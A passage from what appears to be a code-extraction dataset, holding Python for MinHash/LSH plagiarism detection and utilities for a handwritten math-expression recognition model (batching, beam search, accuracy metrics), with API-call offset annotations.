(1002, 1012), True, 'import numpy as np\n')] |
import requests
import pandas as pd
import numpy as np
import io
from nltk.corpus import stopwords
stop = stopwords.words('english')
def remove_stopwords(df, column: str):
df[column +"_without_stopwords"] = df[column].apply(lambda x: ' '.join([word for word in x.split() if word not in stop]))
return df
# url = "https://raw.githubusercontent.com/brmson/dataset-sts/master/data/sts/sick2014/SICK_train.txt"
# text = requests.get(url).text
# data = pd.read_csv(io.StringIO(text), sep="\t")
data = pd.read_csv('plagiarism.csv', encoding= 'unicode_escape')
# print(data.head())
#data = remove_stopwords(data, 'Sentences')
#sentences = data['Sentences_without_stopwords'].tolist()
sentences = data['Sentences'].tolist()
# print(sentences[:3])
#We have our data, now to shingle and one-hot encode it.
def build_shingles(sentence: str, k: int):
shingles = []
for i in range(len(sentence) - k):
shingles.append(sentence[i:i+k])
return set(shingles)
def build_vocab(shingle_sets: list):
# convert list of shingle sets into single set
full_set = {item for set_ in shingle_sets for item in set_}
vocab = {}
for i, shingle in enumerate(list(full_set)):
vocab[shingle] = i
return vocab
def one_hot(shingles: set, vocab: dict):
vec = np.zeros(len(vocab))
for shingle in shingles:
idx = vocab[shingle]
vec[idx] = 1
return vec
k = 6 # shingle size
# build shingles
shingles = []
for sentence in sentences:
shingles.append(build_shingles(sentence, k))
# build vocab
vocab = build_vocab(shingles)
# one-hot encode our shingles
shingles_1hot = []
for shingle_set in shingles:
shingles_1hot.append(one_hot(shingle_set, vocab))
# stack into single numpy array
shingles_1hot = np.stack(shingles_1hot)
print(shingles_1hot.shape)
print(shingles_1hot[0].shape)
# print(sum(shingles_1hot[0])) # confirm we have 1s
# MinHash
# Now we move onto minhashing, first we need to create functions for building a range of minhash vectors, and another to process our sparse vectors through this minhash array - to produce our signatures.
def minhash_arr(vocab: dict, resolution: int):
length = len(vocab.keys())
arr = np.zeros((resolution, length))
for i in range(resolution):
permutation = np.random.permutation(len(vocab)) + 1
arr[i, :] = permutation.copy()
return arr.astype(int)
def get_signature(minhash, vector):
# get index locations of every 1 value in vector
idx = np.nonzero(vector)[0].tolist()
# use index locations to pull only +ve positions in minhash
shingles = minhash[:, idx]
# find minimum value in each hash vector
signature = np.min(shingles, axis=1)
return signature
arr = minhash_arr(vocab, 40)
signatures = []
for vector in shingles_1hot:
signatures.append(get_signature(arr, vector))
# merge signatures into single array
signatures = np.stack(signatures)
#print(signatures.shape)
print(signatures[0])
# LSH
# Finally, we move onto the LSH process. We will use a class here:
from itertools import combinations
class LSH:
buckets = []
counter = 0
def __init__(self, b):
self.b = b
for i in range(b):
self.buckets.append({})
def make_subvecs(self, signature):
l = len(signature)
assert l % self.b == 0
r = int(l / self.b)
# break signature into subvectors
subvecs = []
for i in range(0, l, r):
subvecs.append(signature[i:i+r])
return np.stack(subvecs)
def add_hash(self, signature):
subvecs = self.make_subvecs(signature).astype(str)
for i, subvec in enumerate(subvecs):
subvec = ','.join(subvec)
if subvec not in self.buckets[i].keys():
self.buckets[i][subvec] = []
self.buckets[i][subvec].append(self.counter)
self.counter += 1
def check_candidates(self):
candidates = []
for bucket_band in self.buckets:
keys = bucket_band.keys()
for bucket in keys:
hits = bucket_band[bucket]
if len(hits) > 1:
candidates.extend(combinations(hits, 2))
return set(candidates)
b = 20
lsh = LSH(b)
for signature in signatures:
lsh.add_hash(signature)
print(lsh.buckets)
# Now we've filled our hash buckets all we need to do is loop through each and where we have multiple entries in a single bucket, mark these as our candidate pairs.
candidate_pairs = lsh.check_candidates()
print(len(candidate_pairs))
print(list(candidate_pairs))
# We now have all of our candidate pairs!
# Optimizing the Bands
# Now let's visualize the actual cosine similarity of our signature vectors against whether we identified the signatures as candidate pairs or not.
# (we will also calculate Jaccard but it's less useful here, try both!)
# from sklearn.metrics.pairwise import cosine_similarity
# def jaccard(a: set, b: set):
# return len(a.intersection(b)) / len(a.union(b))
# pairs = pd.DataFrame({
# 'x': [],
# 'y': [],
# 'jaccard': [],
# 'cosine': [],
# 'candidate': []
# })
# from tqdm import tqdm
# data_len = shingles_1hot.shape[0]
# chosen = set()
# # take random sample of pairs
# sample_size = 500
# for _ in tqdm(range(sample_size)):
# x, y = np.random.choice(data_len, 2)
# if x == y or (x, y) in chosen: continue
# chosen.add((x, y))
# vector_x = signatures[x]
# vector_y = signatures[y]
# candidate = 1 if (x, y) in candidate_pairs else 0
# cosine = cosine_similarity([vector_x], [vector_y])[0][0]
# pairs = pairs.append({
# 'x': x,
# 'y': y,
# 'jaccard': jaccard(set(vector_x), set(vector_y)),
# 'cosine': cosine,
# 'candidate': candidate
# }, ignore_index=True)
# # add a normalized cosine column for better alignment
# cos_min = pairs['cosine'].min()
# cos_max = pairs['cosine'].max()
# pairs['cosine_norm'] = (pairs['cosine'] - cos_min) / (cos_max - cos_min)
# import matplotlib.pyplot as plt
# import seaborn as sns
# sns.scatterplot(data=pairs, x='cosine', y='candidate', alpha=0.5)
# plt.show()
# # Now, this is an interesting way to visualize our distribution, but we have reason.
# # We can actually tune our LSH function using b, and we have a formalized function that tells us the probability of identifying a pair as candidate pairs given their similarity.
# # We calculate this as so:
# def probability(s, r, b):
# # s: similarity
# # r: rows (per band)
# # b: number of bands
# return 1 - (1 - s**r)**b
# def normalize(x, x_min, x_max):
# return (x - x_min) / (x_max - x_min)
# # Let's visualize that for our current parameters, alongside our scatter plot.
# b = 25
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# sns.lineplot(x=s_scores, y=P_scores)
# sns.scatterplot(data=pairs, x='cosine', y='candidate', alpha=0.1, color='k')
# plt.show()
# b = 25
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# sns.lineplot(x=s_scores, y=P_scores)
# sns.scatterplot(data=pairs, x='cosine_norm', y='candidate', alpha=0.1, color='k')
# plt.show()
# # From here we can attempt to modify the similarity threshold t - which is the cut-off point on our similarity axes as to where we would like a given cosine similarity to rate as a candidate pair or not.
# # Let's try a few different band values with our probability formula to see where this balance may be.
# probs = pd.DataFrame({
# 'P': [],
# 's': [],
# 'b': []
# })
# for b in [100, 50, 25, 20, 10, 5, 2]:
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# probs = probs.append(pd.DataFrame({
# 'P': P_scores,
# 's': s_scores,
# 'b': [str(b)]*len(s_scores)
# }), ignore_index=True)
# sns.lineplot(data=probs, x='s', y='P', hue='b')
# plt.show()
# # So a b value of 20 have us a threshold value t slightly too high (depending on our definition of 'similar'), so maybe we can use b == 25 to get a better distribution of our candidate pairs.
# b = 25
# lsh = LSH(b)
# for signature in signatures:
# lsh.add_hash(signature)
# candidate_pairs = lsh.check_candidates()
# len(candidate_pairs)
# pairs = pd.DataFrame({
# 'x': [],
# 'y': [],
# 'jaccard': [],
# 'cosine': [],
# 'candidate': []
# })
# data_len = shingles_1hot.shape[0]
# chosen = set()
# # take random sample of pairs
# sample_size = 50_000
# for _ in tqdm(range(sample_size)):
# x, y = np.random.choice(data_len, 2)
# if x == y or (x, y) in chosen: continue
# chosen.add((x, y))
# vector_x = signatures[x]
# vector_y = signatures[y]
# candidate = 1 if (x, y) in candidate_pairs else 0
# cosine = cosine_similarity([vector_x], [vector_y])[0][0]
# pairs = pairs.append({
# 'x': x,
# 'y': y,
# 'jaccard': jaccard(set(vector_x), set(vector_y)),
# 'cosine': cosine,
# 'candidate': candidate
# }, ignore_index=True)
# # add a normalized cosine column for better alignment
# cos_min = pairs['cosine'].min()
# cos_max = pairs['cosine'].max()
# pairs['cosine_norm'] = (pairs['cosine'] - cos_min) / (cos_max - cos_min)
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# sns.lineplot(x=s_scores, y=P_scores)
# sns.scatterplot(data=pairs, x='cosine_norm', y='candidate', alpha=0.1, color='k')
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# sns.lineplot(x=s_scores, y=P_scores)
# sns.scatterplot(data=pairs, x='cosine_norm', y='candidate', alpha=0.1, color='k')
# # Shifting from b == 20 to b == 25 has reduced the number of non-candidates around 0.7 - 0.8, and we can see that the number of candidate pairs in total has increased significantly too, from 7468 to 19436.
# # Now, in our own use-cases, the preferred similarity threshold will of-course change.
# # It's also worth noting that different similarity metrics will produce different charts:
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# sns.lineplot(x=s_scores, y=P_scores)
# sns.scatterplot(data=pairs, x='jaccard', y='candidate', alpha=0.1, color='k')
# plt.show()
| [
"numpy.stack",
"pandas.read_csv",
"numpy.zeros",
"numpy.nonzero",
"itertools.combinations",
"numpy.min",
"nltk.corpus.stopwords.words"
] | [((106, 132), 'nltk.corpus.stopwords.words', 'stopwords.words', (['"""english"""'], {}), "('english')\n", (121, 132), False, 'from nltk.corpus import stopwords\n'), ((505, 561), 'pandas.read_csv', 'pd.read_csv', (['"""plagiarism.csv"""'], {'encoding': '"""unicode_escape"""'}), "('plagiarism.csv', encoding='unicode_escape')\n", (516, 561), True, 'import pandas as pd\n'), ((1759, 1782), 'numpy.stack', 'np.stack', (['shingles_1hot'], {}), '(shingles_1hot)\n', (1767, 1782), True, 'import numpy as np\n'), ((2898, 2918), 'numpy.stack', 'np.stack', (['signatures'], {}), '(signatures)\n', (2906, 2918), True, 'import numpy as np\n'), ((2198, 2228), 'numpy.zeros', 'np.zeros', (['(resolution, length)'], {}), '((resolution, length))\n', (2206, 2228), True, 'import numpy as np\n'), ((2674, 2698), 'numpy.min', 'np.min', (['shingles'], {'axis': '(1)'}), '(shingles, axis=1)\n', (2680, 2698), True, 'import numpy as np\n'), ((3512, 3529), 'numpy.stack', 'np.stack', (['subvecs'], {}), '(subvecs)\n', (3520, 3529), True, 'import numpy as np\n'), ((2487, 2505), 'numpy.nonzero', 'np.nonzero', (['vector'], {}), '(vector)\n', (2497, 2505), True, 'import numpy as np\n'), ((4176, 4197), 'itertools.combinations', 'combinations', (['hits', '(2)'], {}), '(hits, 2)\n', (4188, 4197), False, 'from itertools import combinations\n')] |
import random
import numpy as np
import copy
import sys
import pickle as pkl
import torch
from torch import nn
class BatchBucket():
def __init__(self, max_h, max_w, max_l, max_img_size, max_batch_size, feature_file, label_file, dictionary,
use_all=True):
self._max_img_size = max_img_size
self._max_batch_size = max_batch_size
self._fea_file = feature_file
self._label_file = label_file
self._dictionary_file = dictionary
self._use_all = use_all
self._dict_load()
self._data_load()
self.keys = self._calc_keys(max_h, max_w, max_l)
self._make_plan()
self._reset()
def _dict_load(self):
fp = open(self._dictionary_file)
stuff = fp.readlines()
fp.close()
self._lexicon = {}
for l in stuff:
w = l.strip().split()
self._lexicon[w[0]] = int(w[1])
def _data_load(self):
fp_fea = open(self._fea_file, 'rb')
self._features = pkl.load(fp_fea)
fp_fea.close()
fp_label = open(self._label_file, 'r')
labels = fp_label.readlines()
fp_label.close()
self._targets = {}
for l in labels:
tmp = l.strip().split()
uid = tmp[0]
w_list = []
for w in tmp[1:]:
if self._lexicon.__contains__(w):
w_list.append(self._lexicon[w])
else:
print('a word not in the dictionary !! sentence ', uid, 'word ', w)
sys.exit()
self._targets[uid] = w_list
# (uid, h, w, tgt_len)
self._data_parser = [(uid, fea.shape[1], fea.shape[2], len(label)) for (uid, fea), (_, label) in
zip(self._features.items(), self._targets.items())]
def _calc_keys(self, max_h, max_w, max_l):
mh = mw = ml = 0
for _, h, w, l in self._data_parser:
if h > mh:
mh = h
if w > mw:
mw = w
if l > ml:
ml = l
max_h = min(max_h, mh)
max_w = min(max_w, mw)
max_l = min(max_l, ml)
keys = []
init_h = 64 if 64 < max_h else max_h
init_w = 64 if 64 < max_w else max_w
init_l = 20 if 20 < max_l else max_l
h_step = 64
w_step = 64
l_step = 30
h = init_h
while h <= max_h:
w = init_w
while w <= max_w:
l = init_l
while l <= max_l:
keys.append([h, w, l, h * w * l, 0])
if l < max_l and l + l_step > max_l:
l = max_l
continue
l += l_step
if w < max_w and w + w_step > max_w:
w = max_w
continue
w += w_step
if h < max_h and h + h_step > max_h:
h = max_h
continue
h += h_step
keys = sorted(keys, key=lambda area: area[3])
for _, h, w, l in self._data_parser:
for i in range(len(keys)):
hh, ww, ll, _, _ = keys[i]
if h <= hh and w <= ww and l <= ll:
keys[i][-1] += 1
break
new_keys = []
n_samples = len(self._data_parser)
th = n_samples * 0.01
if self._use_all:
th = 1
num = 0
for key in keys:
hh, ww, ll, _, n = key
num += n
if num >= th:
new_keys.append((hh, ww, ll))
num = 0
return new_keys
def _make_plan(self):
self._bucket_keys = []
for h, w, l in self.keys:
batch_size = int(self._max_img_size / (h * w))
if batch_size > self._max_batch_size:
batch_size = self._max_batch_size
if batch_size == 0:
continue
self._bucket_keys.append((batch_size, h, w, l))
self._data_buckets = [[] for key in self._bucket_keys]
unuse_num = 0
for item in self._data_parser:
flag = 0
for key, bucket in zip(self._bucket_keys, self._data_buckets):
_, h, w, l = key
if item[1] <= h and item[2] <= w and item[3] <= l:
bucket.append(item)
flag = 1
break
if flag == 0:
unuse_num += 1
print('The number of unused samples: ', unuse_num)
all_sample_num = 0
for key, bucket in zip(self._bucket_keys, self._data_buckets):
sample_num = len(bucket)
all_sample_num += sample_num
print('bucket {}, sample number={}'.format(key, len(bucket)))
print('All samples number={}, raw samples number={}'.format(all_sample_num, len(self._data_parser)))
def _reset(self):
# shuffle data in each bucket
for bucket in self._data_buckets:
random.shuffle(bucket)
self._batches = []
for id, (key, bucket) in enumerate(zip(self._bucket_keys, self._data_buckets)):
batch_size, _, _, _ = key
bucket_len = len(bucket)
batch_num = (bucket_len + batch_size - 1) // batch_size
for i in range(batch_num):
start = i * batch_size
end = start + batch_size if start + batch_size < bucket_len else bucket_len
if start != end: # remove empty batch
self._batches.append(bucket[start:end])
def get_batches(self):
batches = []
uid_batches = []
for batch_info in self._batches:
fea_batch = []
label_batch = []
for uid, _, _, _ in batch_info:
feature = self._features[uid]
label = self._targets[uid]
fea_batch.append(feature)
label_batch.append(label)
uid_batches.append(uid)
batches.append((fea_batch, label_batch))
return batches, uid_batches
# load dictionary
def load_dict(dictFile):
fp = open(dictFile)
stuff = fp.readlines()
fp.close()
lexicon = {}
for l in stuff:
w = l.strip().split()
lexicon[w[0]] = int(w[1])
print('total words/phones', len(lexicon))
return lexicon
# create batch
def prepare_data(params, images_x, seqs_ly, seqs_ry, seqs_re, seqs_ma, seqs_lp, seqs_rp):
heights_x = [s.shape[1] for s in images_x]
widths_x = [s.shape[2] for s in images_x]
lengths_ly = [len(s) for s in seqs_ly]
lengths_ry = [len(s) for s in seqs_ry]
n_samples = len(heights_x)
max_height_x = np.max(heights_x)
max_width_x = np.max(widths_x)
maxlen_ly = np.max(lengths_ly)
maxlen_ry = np.max(lengths_ry)
x = np.zeros((n_samples, params['input_channels'], max_height_x, max_width_x)).astype(np.float32)
ly = np.zeros((maxlen_ly, n_samples)).astype(np.int64) # <eos> must be 0 in the dict
ry = np.zeros((maxlen_ry, n_samples)).astype(np.int64)
re = np.zeros((maxlen_ly, n_samples)).astype(np.int64)
ma = np.zeros((n_samples, maxlen_ly, maxlen_ly)).astype(np.int64)
lp = np.zeros((maxlen_ly, n_samples)).astype(np.int64)
rp = np.zeros((maxlen_ry, n_samples)).astype(np.int64)
x_mask = np.zeros((n_samples, max_height_x, max_width_x)).astype(np.float32)
ly_mask = np.zeros((maxlen_ly, n_samples)).astype(np.float32)
ry_mask = np.zeros((maxlen_ry, n_samples)).astype(np.float32)
re_mask = np.zeros((maxlen_ly, n_samples)).astype(np.float32)
ma_mask = np.zeros((n_samples, maxlen_ly, maxlen_ly)).astype(np.float32)
for idx, [s_x, s_ly, s_ry, s_re, s_ma, s_lp, s_rp] in enumerate(zip(images_x, seqs_ly, seqs_ry, seqs_re, seqs_ma, seqs_lp, seqs_rp)):
x[idx, :, :heights_x[idx], :widths_x[idx]] = s_x / 255.
x_mask[idx, :heights_x[idx], :widths_x[idx]] = 1.
ly[:lengths_ly[idx], idx] = s_ly
ly_mask[:lengths_ly[idx], idx] = 1.
ry[:lengths_ry[idx], idx] = s_ry
ry_mask[:lengths_ry[idx], idx] = 1.
ry_mask[0, idx] = 0. # remove the <s>
re[:lengths_ly[idx], idx] = s_re
re_mask[:lengths_ly[idx], idx] = 1.
re_mask[0, idx] = 0. # remove the Start relation
re_mask[lengths_ly[idx]-1, idx] = 0. # remove the End relation
ma[idx, :lengths_ly[idx], :lengths_ly[idx]] = s_ma
for ma_idx in range(lengths_ly[idx]):
ma_mask[idx, :(ma_idx+1), ma_idx] = 1.
lp[:lengths_ly[idx], idx] = s_lp
# lp_mask[:lengths_ly[idx], idx] = 1
rp[:lengths_ry[idx], idx] = s_rp
return x, x_mask, ly, ly_mask, ry, ry_mask, re, re_mask, ma, ma_mask, lp, rp
def gen_sample(model, x, params, gpu_flag, k=1, maxlen=30, rpos_beam=3):
sample = []
sample_score = []
rpos_sample = []
# rpos_sample_score = []
relation_sample = []
live_k = 1
dead_k = 0 # except init, live_k = k - dead_k
# current living paths and corresponding scores(-log)
hyp_samples = [[]] * live_k
hyp_scores = np.zeros(live_k).astype(np.float32)
hyp_rpos_samples = [[]] * live_k
hyp_relation_samples = [[]] * live_k
# get init state, (1,n) and encoder output, (1,D,H,W)
next_state, ctx0 = model.f_init(x)
next_h1t = next_state
# -1 -> My_embedding -> 0 tensor(1,m)
next_lw = -1 * torch.ones(1, dtype=torch.int64).cuda()
next_calpha_past = torch.zeros(1, ctx0.shape[2], ctx0.shape[3]).cuda() # (live_k,H,W)
next_palpha_past = torch.zeros(1, ctx0.shape[2], ctx0.shape[3]).cuda()
nextemb_memory = torch.zeros(params['maxlen'], live_k, params['m']).cuda()
nextePmb_memory = torch.zeros(params['maxlen'], live_k, params['m']).cuda()
for ii in range(maxlen):
ctxP = ctx0.repeat(live_k, 1, 1, 1) # (live_k,D,H,W)
next_lpos = ii * torch.ones(live_k, dtype=torch.int64).cuda()
next_h01, next_ma, next_ctP, next_pa, next_palpha_past, nextemb_memory, nextePmb_memory = \
model.f_next_parent(params, next_lw, next_lpos, ctxP, next_state, next_h1t, next_palpha_past, nextemb_memory, nextePmb_memory, ii)
next_ma = next_ma.cpu().numpy()
# next_ctP = next_ctP.cpu().numpy()
next_palpha_past = next_palpha_past.cpu().numpy()
nextemb_memory = nextemb_memory.cpu().numpy()
nextePmb_memory = nextePmb_memory.cpu().numpy()
nextemb_memory = np.transpose(nextemb_memory, (1, 0, 2)) # batch * Matt * dim
nextePmb_memory = np.transpose(nextePmb_memory, (1, 0, 2))
next_rpos = next_ma.argsort(axis=1)[:,-rpos_beam:] # topK parent index; batch * topK
n_gaps = nextemb_memory.shape[1]
n_batch = nextemb_memory.shape[0]
next_rpos_gap = next_rpos + n_gaps * np.arange(n_batch)[:, None]
next_remb_memory = nextemb_memory.reshape([n_batch*n_gaps, nextemb_memory.shape[-1]])
next_remb = next_remb_memory[next_rpos_gap.flatten()] # [batch*rpos_beam, emb_dim]
rpos_scores = next_ma.flatten()[next_rpos_gap.flatten()] # [batch*rpos_beam,]
# next_ctPC = next_ctP.repeat(1, 1, rpos_beam)
# next_ctPC = torch.reshape(next_ctPC, (-1, next_ctP.shape[1]))
ctxC = ctx0.repeat(live_k*rpos_beam, 1, 1, 1)
next_ctPC = torch.zeros(next_ctP.shape[0]*rpos_beam, next_ctP.shape[1]).cuda()
next_h01C = torch.zeros(next_h01.shape[0]*rpos_beam, next_h01.shape[1]).cuda()
next_calpha_pastC = torch.zeros(next_calpha_past.shape[0]*rpos_beam, next_calpha_past.shape[1], next_calpha_past.shape[2]).cuda()
for bidx in range(next_calpha_past.shape[0]):
for ridx in range(rpos_beam):
next_ctPC[bidx*rpos_beam+ridx] = next_ctP[bidx]
next_h01C[bidx*rpos_beam+ridx] = next_h01[bidx]
next_calpha_pastC[bidx*rpos_beam+ridx] = next_calpha_past[bidx]
next_remb = torch.from_numpy(next_remb).cuda()
next_lp, next_rep, next_state, next_h1t, next_ca, next_calpha_past, next_re = \
model.f_next_child(params, next_remb, next_ctPC, ctxC, next_h01C, next_calpha_pastC)
next_lp = next_lp.cpu().numpy()
next_state = next_state.cpu().numpy()
next_h1t = next_h1t.cpu().numpy()
next_calpha_past = next_calpha_past.cpu().numpy()
next_re = next_re.cpu().numpy()
hyp_scores = np.tile(hyp_scores[:, None], [1, rpos_beam]).flatten()
cand_scores = hyp_scores[:, None] - np.log(next_lp+1e-10)- np.log(rpos_scores+1e-10)[:,None]
cand_flat = cand_scores.flatten()
ranks_flat = cand_flat.argsort()[:(k-dead_k)]
voc_size = next_lp.shape[1]
trans_indices = ranks_flat // voc_size
trans_indicesP = ranks_flat // (voc_size*rpos_beam)
word_indices = ranks_flat % voc_size
costs = cand_flat[ranks_flat]
# update paths
new_hyp_samples = []
new_hyp_scores = np.zeros(k-dead_k).astype('float32')
new_hyp_rpos_samples = []
new_hyp_relation_samples = []
new_hyp_states = []
new_hyp_h1ts = []
new_hyp_calpha_past = []
new_hyp_palpha_past = []
new_hyp_emb_memory = []
new_hyp_ePmb_memory = []
for idx, [ti, wi, tPi] in enumerate(zip(trans_indices, word_indices, trans_indicesP)):
new_hyp_samples.append(hyp_samples[tPi]+[wi])
new_hyp_scores[idx] = copy.copy(costs[idx])
new_hyp_rpos_samples.append(hyp_rpos_samples[tPi]+[next_rpos.flatten()[ti]])
new_hyp_relation_samples.append(hyp_relation_samples[tPi]+[next_re[ti]])
new_hyp_states.append(copy.copy(next_state[ti]))
new_hyp_h1ts.append(copy.copy(next_h1t[ti]))
new_hyp_calpha_past.append(copy.copy(next_calpha_past[ti]))
new_hyp_palpha_past.append(copy.copy(next_palpha_past[tPi]))
new_hyp_emb_memory.append(copy.copy(nextemb_memory[tPi]))
new_hyp_ePmb_memory.append(copy.copy(nextePmb_memory[tPi]))
# check the finished samples
new_live_k = 0
hyp_samples = []
hyp_scores = []
hyp_rpos_samples = []
hyp_relation_samples = []
hyp_states = []
hyp_h1ts = []
hyp_calpha_past = []
hyp_palpha_past = []
hyp_emb_memory = []
hyp_ePmb_memory = []
for idx in range(len(new_hyp_samples)):
if new_hyp_samples[idx][-1] == 0: # <eol>
sample_score.append(new_hyp_scores[idx])
sample.append(new_hyp_samples[idx])
rpos_sample.append(new_hyp_rpos_samples[idx])
relation_sample.append(new_hyp_relation_samples[idx])
dead_k += 1
else:
new_live_k += 1
hyp_scores.append(new_hyp_scores[idx])
hyp_samples.append(new_hyp_samples[idx])
hyp_rpos_samples.append(new_hyp_rpos_samples[idx])
hyp_relation_samples.append(new_hyp_relation_samples[idx])
hyp_states.append(new_hyp_states[idx])
hyp_h1ts.append(new_hyp_h1ts[idx])
hyp_calpha_past.append(new_hyp_calpha_past[idx])
hyp_palpha_past.append(new_hyp_palpha_past[idx])
hyp_emb_memory.append(new_hyp_emb_memory[idx])
hyp_ePmb_memory.append(new_hyp_ePmb_memory[idx])
hyp_scores = np.array(hyp_scores)
live_k = new_live_k
# whether finish beam search
if new_live_k < 1:
break
if dead_k >= k:
break
next_lw = np.array([w[-1] for w in hyp_samples]) # each path's final symbol, (live_k,)
next_state = np.array(hyp_states) # h2t, (live_k,n)
next_h1t = np.array(hyp_h1ts)
next_calpha_past = np.array(hyp_calpha_past) # (live_k,H,W)
next_palpha_past = np.array(hyp_palpha_past)
nextemb_memory = np.array(hyp_emb_memory)
nextemb_memory = np.transpose(nextemb_memory, (1, 0, 2))
nextePmb_memory = np.array(hyp_ePmb_memory)
nextePmb_memory = np.transpose(nextePmb_memory, (1, 0, 2))
next_lw = torch.from_numpy(next_lw).cuda()
next_state = torch.from_numpy(next_state).cuda()
next_h1t = torch.from_numpy(next_h1t).cuda()
next_calpha_past = torch.from_numpy(next_calpha_past).cuda()
next_palpha_past = torch.from_numpy(next_palpha_past).cuda()
nextemb_memory = torch.from_numpy(nextemb_memory).cuda()
nextePmb_memory = torch.from_numpy(nextePmb_memory).cuda()
return sample_score, sample, rpos_sample, relation_sample
# init model params
def weight_init(m):
if isinstance(m, nn.Conv2d):
nn.init.xavier_uniform_(m.weight.data)
try:
nn.init.constant_(m.bias.data, 0.)
except:
pass
if isinstance(m, nn.Linear):
nn.init.xavier_uniform_(m.weight.data)
try:
nn.init.constant_(m.bias.data, 0.)
except:
pass
# compute metric
def cmp_result(rec,label):
dist_mat = np.zeros((len(label)+1, len(rec)+1),dtype='int32')
dist_mat[0,:] = range(len(rec) + 1)
dist_mat[:,0] = range(len(label) + 1)
for i in range(1, len(label) + 1):
for j in range(1, len(rec) + 1):
hit_score = dist_mat[i-1, j-1] + (label[i-1] != rec[j-1])
ins_score = dist_mat[i,j-1] + 1
del_score = dist_mat[i-1, j] + 1
dist_mat[i,j] = min(hit_score, ins_score, del_score)
dist = dist_mat[len(label), len(rec)]
return dist, len(label)
def compute_wer(rec_mat, label_mat):
total_dist = 0
total_label = 0
total_line = 0
total_line_rec = 0
for key_rec in rec_mat:
label = label_mat[key_rec]
rec = rec_mat[key_rec]
# label = list(map(int,label))
# rec = list(map(int,rec))
dist, llen = cmp_result(rec, label)
total_dist += dist
total_label += llen
total_line += 1
if dist == 0:
total_line_rec += 1
wer = float(total_dist)/total_label
sacc = float(total_line_rec)/total_line
return wer, sacc
def cmp_sacc_result(rec_list,label_list,rec_ridx_list,label_ridx_list,rec_re_list,label_re_list,chdict,redict):
rec = True
out_sym_pdict = {}
label_sym_pdict = {}
out_sym_pdict['0'] = '<s>'
label_sym_pdict['0'] = '<s>'
for idx, sym in enumerate(rec_list):
out_sym_pdict[str(idx+1)] = chdict[sym]
for idx, sym in enumerate(label_list):
label_sym_pdict[str(idx+1)] = chdict[sym]
if len(rec_list) != len(label_list):
rec = False
else:
for idx in range(len(rec_list)):
out_sym = chdict[rec_list[idx]]
label_sym = chdict[label_list[idx]]
out_repos = int(rec_ridx_list[idx])
label_repos = int(label_ridx_list[idx])
out_re = redict[rec_re_list[idx]]
label_re = redict[label_re_list[idx]]
if out_repos in out_sym_pdict:
out_resym_s = out_sym_pdict[out_repos]
else:
out_resym_s = 'unknown'
if label_repos in label_sym_pdict:
label_resym_s = label_sym_pdict[label_repos]
else:
label_resym_s = 'unknown'
# post-processing only for math recognition
if (out_resym_s == '\lim' and label_resym_s == '\lim') or \
(out_resym_s == '\int' and label_resym_s == '\int') or \
(out_resym_s == '\sum' and label_resym_s == '\sum'):
if out_re == 'Above':
out_re = 'Sup'
if out_re == 'Below':
out_re = 'Sub'
if label_re == 'Above':
label_re = 'Sup'
if label_re == 'Below':
label_re = 'Sub'
# if out_sym != label_sym or out_pos != label_pos or out_repos != label_repos or out_re != label_re:
# if out_sym != label_sym or out_repos != label_repos:
if out_sym != label_sym or out_repos != label_repos or out_re != label_re:
rec = False
break
return rec
def compute_sacc(rec_mat, label_mat, rec_ridx_mat, label_ridx_mat, rec_re_mat, label_re_mat, chdict, redict):
total_num = len(rec_mat)
correct_num = 0
for key_rec in rec_mat:
rec_list = rec_mat[key_rec]
label_list = label_mat[key_rec]
rec_ridx_list = rec_ridx_mat[key_rec]
label_ridx_list = label_ridx_mat[key_rec]
rec_re_list = rec_re_mat[key_rec]
label_re_list = label_re_mat[key_rec]
rec_result = cmp_sacc_result(rec_list,label_list,rec_ridx_list,label_ridx_list,rec_re_list,label_re_list,chdict,redict)
if rec_result:
correct_num += 1
correct_rate = 1. * correct_num / total_num
return correct_rate
| [
"torch.ones",
"numpy.log",
"random.shuffle",
"torch.nn.init.xavier_uniform_",
"numpy.transpose",
"numpy.zeros",
"copy.copy",
"numpy.max",
"pickle.load",
"numpy.array",
"torch.nn.init.constant_",
"numpy.tile",
"numpy.arange",
"torch.zeros",
"sys.exit",
"torch.from_numpy"
] | [((6755, 6772), 'numpy.max', 'np.max', (['heights_x'], {}), '(heights_x)\n', (6761, 6772), True, 'import numpy as np\n'), ((6791, 6807), 'numpy.max', 'np.max', (['widths_x'], {}), '(widths_x)\n', (6797, 6807), True, 'import numpy as np\n'), ((6824, 6842), 'numpy.max', 'np.max', (['lengths_ly'], {}), '(lengths_ly)\n', (6830, 6842), True, 'import numpy as np\n'), ((6859, 6877), 'numpy.max', 'np.max', (['lengths_ry'], {}), '(lengths_ry)\n', (6865, 6877), True, 'import numpy as np\n'), ((1017, 1033), 'pickle.load', 'pkl.load', (['fp_fea'], {}), '(fp_fea)\n', (1025, 1033), True, 'import pickle as pkl\n'), ((10514, 10553), 'numpy.transpose', 'np.transpose', (['nextemb_memory', '(1, 0, 2)'], {}), '(nextemb_memory, (1, 0, 2))\n', (10526, 10553), True, 'import numpy as np\n'), ((10601, 10641), 'numpy.transpose', 'np.transpose', (['nextePmb_memory', '(1, 0, 2)'], {}), '(nextePmb_memory, (1, 0, 2))\n', (10613, 10641), True, 'import numpy as np\n'), ((15534, 15554), 'numpy.array', 'np.array', (['hyp_scores'], {}), '(hyp_scores)\n', (15542, 15554), True, 'import numpy as np\n'), ((15727, 15765), 'numpy.array', 'np.array', (['[w[-1] for w in hyp_samples]'], {}), '([w[-1] for w in hyp_samples])\n', (15735, 15765), True, 'import numpy as np\n'), ((15826, 15846), 'numpy.array', 'np.array', (['hyp_states'], {}), '(hyp_states)\n', (15834, 15846), True, 'import numpy as np\n'), ((15885, 15903), 'numpy.array', 'np.array', (['hyp_h1ts'], {}), '(hyp_h1ts)\n', (15893, 15903), True, 'import numpy as np\n'), ((15931, 15956), 'numpy.array', 'np.array', (['hyp_calpha_past'], {}), '(hyp_calpha_past)\n', (15939, 15956), True, 'import numpy as np\n'), ((16000, 16025), 